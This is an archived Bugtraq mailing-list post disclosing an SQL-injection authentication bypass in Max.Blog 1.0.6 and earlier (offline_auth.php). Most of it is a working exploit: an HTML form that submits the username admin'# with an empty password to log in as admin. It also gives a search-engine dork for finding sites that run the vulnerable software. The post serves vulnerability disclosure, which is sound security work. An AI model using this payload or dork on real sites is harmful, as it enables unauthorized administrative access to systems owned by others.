Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Tue, 27 Jan 2009 22:13:59 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=7qPH1xidG1reCEbjhllsscVA5PWeFp6FYkpj8NAJUDk=; b=EgxwJ42C5oaXMg+S5Bl9t1BcmHreX5pvOyLn2np0FO6RWadXzYuqvDxZdmJwaHgUu6 mqMPbfbHRGLEmXX1cM60Xvs/qdoCzSuFv5A1aT5wRfSJDBn8wMkghoS6CvpzuBmZ094j krPDEUeqYufde2EZ0kkrHZjMmJMjp2vljYOPg=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=EsqZIzOY27LPzbn4UazHrk07EqJZE13IZPNsHh2iWn3aBGD9LoQYQuPD2w5zfdMx32 t++apR1Z6bwqqkQm3Lm2oQZaZa96u8OmiAJ8ahrS+37rCVb0o19ZYKeVb9ln3UyYyQzz F8f1z5qmdHdhzDqRXUggntpaFVTsPCp3QzV/o=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###################             Salvatore "drosophila" Fresta    
###################


Application:    Max.Blog
                                http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * Offline Authentication Bypass
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                        e-mail: drosophilaxxx@xxxxxxxxx
                

############################################################################

- BUGS

Offline Authentication Bypass Exploit:

        Requisites: magic quotes = off

        File affected: offline_auth.php

        This bug allows a guest to bypass an offline authentication service
        using SQL Injection vulnerability.

############################################################################

- CODE

<html>
        <head>
                <title>
                        Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 
Offline
Authentication Bypass Exploit
                </title>
        </head>
        <body>
                <form action="http://www.site.com/path/offline_auth.php"; 
method="POST">
                        <input type="text" name="username" value="admin'#" 
size="15">
                        <input type="hidden" name="password">
                        <input type="submit" value="Go!">
                </form>
        </body>
</html>

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

Prev by Date: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
Next by Date: [USN-713-1] openjdk-6 vulnerabilities
Previous by thread: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
Next by thread: [USN-713-1] openjdk-6 vulnerabilities
Index(es):
- Date
- Thread